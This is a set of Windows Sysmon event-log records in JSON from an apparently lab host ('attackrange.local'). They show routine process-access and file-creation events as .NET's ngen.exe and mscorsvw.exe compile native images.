{"EventTime":"2020-08-01 05:59:23","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7440,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:23.496\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001078C00D00}\r\nTargetProcessId: 4308\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:23.496","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001078C00D00}","TargetProcessId":"4308","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:23","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7441,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:23.496\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001078C00D00}\r\nTargetProcessId: 4308\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:23.496","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001078C00D00}","TargetProcessId":"4308","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7442,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:24.465\r\nProcessGuid: {A837DB8D-04BB-5F25-0000-0010E7441000}\r\nProcessId: 4308\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10d4-0\\System.Data.Services.Client.dll\r\nCreationUtcTime: 2020-08-01 05:59:24.465","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:24.465","ProcessGuid":"{A837DB8D-04BB-5F25-0000-0010E7441000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10d4-0\\System.Data.Services.Client.dll","CreationUtcTime":"2020-08-01 05:59:24.465","EventReceivedTime":"2020-08-01 05:59:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7443,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:24.512\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001056C40D00}\r\nTargetProcessId: 2936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:24.512","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001056C40D00}","TargetProcessId":"2936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7444,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:24.512\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001056C40D00}\r\nTargetProcessId: 2936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:24.512","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001056C40D00}","TargetProcessId":"2936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7445,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:24.528\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04BC-5F25-0000-0010E2481000}\r\nTargetProcessId: 2936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:24.528","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04BC-5F25-0000-0010E2481000}","TargetProcessId":"2936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7446,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:24.731\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010DCCC0D00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:24.731","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010DCCC0D00}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7447,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:24.731\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010DCCC0D00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:24.731","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010DCCC0D00}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7448,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:24.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010DCCC0D00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:24.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010DCCC0D00}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
